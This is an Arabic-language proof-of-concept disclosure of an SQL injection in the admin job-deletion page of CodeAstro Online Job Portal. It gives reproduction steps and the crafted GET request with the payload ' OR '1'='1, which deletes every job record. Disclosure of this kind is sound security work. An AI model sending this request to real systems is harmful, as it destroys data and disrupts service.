
إثبات مفهوم لاستغلال حقن SQL في بوابة الوظائف عبر الإنترنت CodeAstro Online Job Portal، مما يسمح بحذف جميع سجلات الوظائف عبر طلب GET مُصمم خصيصًا مع مصادقة.
تم تحديد ثغرة حقن SQL في ميزة حذف الوظائف الخاصة بالمشرف في بوابة الوظائف عبر الإنترنت من CodeAstro.
يستخدم التطبيق معامل id مباشرة في استعلام SQL دون تحقق مناسب أو ربط للمعاملات. ونتيجة لذلك، يمكن للمهاجم تعديل الاستعلام عن طريق حقن مدخلات ضارة.
من خلال استغلال هذه الثغرة، يمكن لمستخدم مصادق عليه تغيير منطق الاستعلام المقصود وحذف جميع سجلات الوظائف من قاعدة البيانات بدلاً من حذف سجل واحد فقط.
قم بتسجيل الدخول إلى لوحة التحكم الخاصة بالمشرف.
انتقل إلى:
/admin/jobs-admins/show-jobs.php

تأكد من وجود عدة إدخالات وظائف.
أرسل الطلب التالي:
GET /admin/jobs-admins/delete-jobs.php?id=48' OR '1'='1 HTTP/1.1
Host: target

يتم حذف جميع إدخالات الوظائف من قاعدة البيانات بدلاً من حذف إدخال واحد فقط.

' OR '1'='1
يمكن لمهاجم مصادق عليه حذف جميع إعلانات الوظائف في النظام، مما يؤدي إلى فقدان كامل للبيانات وتعطيل الخدمة.